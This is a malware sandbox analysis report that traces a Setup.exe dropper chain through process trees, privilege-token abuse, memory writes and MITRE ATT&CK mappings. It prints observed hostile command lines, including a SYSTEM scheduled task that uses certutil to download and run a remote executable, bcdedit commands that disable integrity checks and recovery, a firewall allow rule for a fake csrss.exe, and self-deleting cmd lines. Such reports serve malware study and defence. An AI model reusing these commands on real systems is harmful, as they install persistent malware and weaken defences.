pid Process 3900 MicrosoftEdgeCP.exe 3128 seed.exe 4496 AB48.exe 4632 B8A8.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 1236 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeMachineAccountPrivilege 804 msiexec.exe Token: SeTcbPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 804 msiexec.exe Token: SeTakeOwnershipPrivilege 804 msiexec.exe Token: SeLoadDriverPrivilege 804 msiexec.exe Token: SeSystemProfilePrivilege 804 msiexec.exe Token: SeSystemtimePrivilege 804 msiexec.exe Token: SeProfSingleProcessPrivilege 804 msiexec.exe Token: SeIncBasePriorityPrivilege 804 msiexec.exe Token: SeCreatePagefilePrivilege 804 msiexec.exe Token: SeCreatePermanentPrivilege 804 msiexec.exe Token: SeBackupPrivilege 804 msiexec.exe Token: SeRestorePrivilege 804 msiexec.exe Token: SeShutdownPrivilege 804 msiexec.exe Token: SeDebugPrivilege 804 msiexec.exe Token: SeAuditPrivilege 804 msiexec.exe Token: SeSystemEnvironmentPrivilege 804 msiexec.exe Token: SeChangeNotifyPrivilege 804 msiexec.exe Token: SeRemoteShutdownPrivilege 804 msiexec.exe Token: SeUndockPrivilege 804 msiexec.exe Token: SeSyncAgentPrivilege 804 msiexec.exe Token: SeEnableDelegationPrivilege 804 msiexec.exe Token: SeManageVolumePrivilege 804 msiexec.exe Token: SeImpersonatePrivilege 804 msiexec.exe Token: SeCreateGlobalPrivilege 804 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe Token: SeIncreaseQuotaPrivilege 804 msiexec.exe Token: SeMachineAccountPrivilege 804 msiexec.exe Token: SeTcbPrivilege 804 msiexec.exe Token: SeSecurityPrivilege 804 msiexec.exe Token: SeTakeOwnershipPrivilege 804 msiexec.exe Token: SeLoadDriverPrivilege 804 msiexec.exe Token: SeSystemProfilePrivilege 804 msiexec.exe Token: SeSystemtimePrivilege 804 msiexec.exe Token: SeProfSingleProcessPrivilege 804 msiexec.exe Token: SeIncBasePriorityPrivilege 804 msiexec.exe Token: SeCreatePagefilePrivilege 804 msiexec.exe Token: SeCreatePermanentPrivilege 804 msiexec.exe Token: SeBackupPrivilege 804 msiexec.exe Token: SeRestorePrivilege 804 msiexec.exe Token: SeShutdownPrivilege 804 msiexec.exe Token: SeDebugPrivilege 804 msiexec.exe Token: SeAuditPrivilege 804 msiexec.exe Token: SeSystemEnvironmentPrivilege 804 msiexec.exe Token: SeChangeNotifyPrivilege 804 msiexec.exe Token: SeRemoteShutdownPrivilege 804 msiexec.exe Token: SeUndockPrivilege 804 msiexec.exe Token: SeSyncAgentPrivilege 804 msiexec.exe Token: SeEnableDelegationPrivilege 804 msiexec.exe Token: SeManageVolumePrivilege 804 msiexec.exe Token: SeImpersonatePrivilege 804 msiexec.exe Token: SeCreateGlobalPrivilege 804 msiexec.exe Token: SeCreateTokenPrivilege 804 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 804 msiexec.exe Token: SeLockMemoryPrivilege 804 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 804 msiexec.exe 2192 23E04C4F32EF2158.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3288 MicrosoftEdge.exe 3900 MicrosoftEdgeCP.exe 3900 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1108 wrote to memory of 804 1108 Setup.exe 76 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1236 wrote to memory of 1356 1236 msiexec.exe 79 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1328 1108 Setup.exe 83 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 1196 1108 Setup.exe 84 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 1108 wrote to memory of 3428 1108 Setup.exe 85 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 3428 wrote to memory of 3488 3428 cmd.exe 87 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1328 wrote to memory of 2760 1328 6489A2274AE24900.exe 88 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 1196 wrote to memory of 876 1196 6489A2274AE24900.exe 89 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 876 wrote to memory of 2832 876 cmd.exe 91 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1328 wrote to memory of 4084 1328 6489A2274AE24900.exe 93 PID 1196 wrote to memory of 3992 1196 6489A2274AE24900.exe 94 PID 1196 wrote to memory of 3992 1196 6489A2274AE24900.exe 94 PID 1196 wrote to memory of 3992 1196 6489A2274AE24900.exe 94 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 3992 wrote to memory of 1340 3992 cmd.exe 96 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 1604 1328 6489A2274AE24900.exe 97 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 2132 1328 6489A2274AE24900.exe 98 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3244 1328 6489A2274AE24900.exe 99 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 3820 1328 6489A2274AE24900.exe 100 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 188 1328 6489A2274AE24900.exe 101 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 3060 1328 6489A2274AE24900.exe 102 PID 1328 wrote to memory of 4040 1328 6489A2274AE24900.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:2760
-
-
C:\Users\Admin\AppData\Roaming\1613214372547.exe"C:\Users\Admin\AppData\Roaming\1613214372547.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214372547.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:1604
-
-
C:\Users\Admin\AppData\Roaming\1613214377312.exe"C:\Users\Admin\AppData\Roaming\1613214377312.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214377312.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:3244
-
-
C:\Users\Admin\AppData\Roaming\1613214382562.exe"C:\Users\Admin\AppData\Roaming\1613214382562.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214382562.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"3⤵
- Executes dropped EXE
PID:188
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent3⤵
- Executes dropped EXE
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\is-LHR7R.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-LHR7R.tmp\23E04C4F32EF2158.tmp" /SL5="$901D8,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2192 -
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1724 -
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3128
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"5⤵
- Checks computer location settings
PID:2060
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"3⤵PID:4352
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:4396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:1340
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
PID:3488
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0E1D733D9CA4961A31B8C2E3CA8122AC C2⤵
- Loads dropped DLL
PID:1356
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3288
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:1860
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4748
-
C:\Users\Admin\AppData\Local\Temp\9451.exeC:\Users\Admin\AppData\Local\Temp\9451.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4844 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\1b28d49a-b6d6-4a54-ba7e-567865d12d68" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\9451.exe"C:\Users\Admin\AppData\Local\Temp\9451.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
PID:3192 -
C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin1.exe"C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin1.exe"3⤵
- Executes dropped EXE
PID:5032
-
-
C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin2.exe"C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin2.exe"3⤵
- Executes dropped EXE
PID:1740
-
-
C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe"C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe"3⤵
- Executes dropped EXE
PID:4628 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\updatewin.exe4⤵PID:5000
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:3888
-
-
-
-
C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe"C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4680 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\fee2cd81-b135-4f50-abef-216a80e5d45d\5.exe & exit4⤵PID:5864
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:5912
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9666.exeC:\Users\Admin\AppData\Local\Temp\9666.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9666.exe /f & erase C:\Users\Admin\AppData\Local\Temp\9666.exe & exit2⤵PID:4692
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9666.exe /f3⤵
- Kills process with taskkill
PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\9A8D.exeC:\Users\Admin\AppData\Local\Temp\9A8D.exe1⤵
- Executes dropped EXE
PID:4884 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9A8D.exe"2⤵PID:3520
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:4896
-
-
-
C:\Users\Admin\AppData\Local\Temp\A339.exeC:\Users\Admin\AppData\Local\Temp\A339.exe1⤵
- Executes dropped EXE
PID:5108
-
C:\Users\Admin\AppData\Local\Temp\AB48.exeC:\Users\Admin\AppData\Local\Temp\AB48.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4496
-
C:\Users\Admin\AppData\Local\Temp\B607.exeC:\Users\Admin\AppData\Local\Temp\B607.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4948 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 24922⤵
- Drops file in Windows directory
- Program crash
PID:5136
-
-
C:\Users\Admin\AppData\Local\Temp\B8A8.exeC:\Users\Admin\AppData\Local\Temp\B8A8.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\B8A8.exeC:\Users\Admin\AppData\Local\Temp\B8A8.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\BFFC.exeC:\Users\Admin\AppData\Local\Temp\BFFC.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:3908
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:5632
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2604
-
C:\Users\Admin\AppData\Local\Temp\C8A8.exeC:\Users\Admin\AppData\Local\Temp\C8A8.exe1⤵
- Executes dropped EXE
PID:3208 -
C:\Users\Admin\AppData\Local\Temp\C8A8.exe"C:\Users\Admin\AppData\Local\Temp\C8A8.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:5748 -
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:6012
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6100 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:5180
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:1192
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5292 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
PID:4064
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:3100
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:4468
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
PID:5432
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
PID:5436
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
PID:5256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
PID:5948
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
PID:5892
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
PID:6028
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
PID:5824
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
PID:6080
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
PID:6052
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
PID:5768
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy5⤵
- Modifies boot configuration data using bcdedit
PID:6108
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵PID:5252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D0F6.exeC:\Users\Admin\AppData\Local\Temp\D0F6.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5336 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D0F6.exe"2⤵PID:5780
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:5828
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5716
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies data under HKEY_USERS
PID:6056
-
C:\Users\Admin\AppData\Local\Temp\24E3.exeC:\Users\Admin\AppData\Local\Temp\24E3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\24E3.exeC:\Users\Admin\AppData\Local\Temp\24E3.exe2⤵
- Executes dropped EXE
- Drops startup file
PID:4732 -
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
- Executes dropped EXE
PID:5676 -
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"4⤵PID:5272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2AB1.exeC:\Users\Admin\AppData\Local\Temp\2AB1.exe1⤵
- Executes dropped EXE
PID:5144
-
C:\Users\Admin\AppData\Local\Temp\4F12.exeC:\Users\Admin\AppData\Local\Temp\4F12.exe1⤵PID:5784
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Impair Defenses
1Install Root Certificate
1Modify Registry
5Web Service
1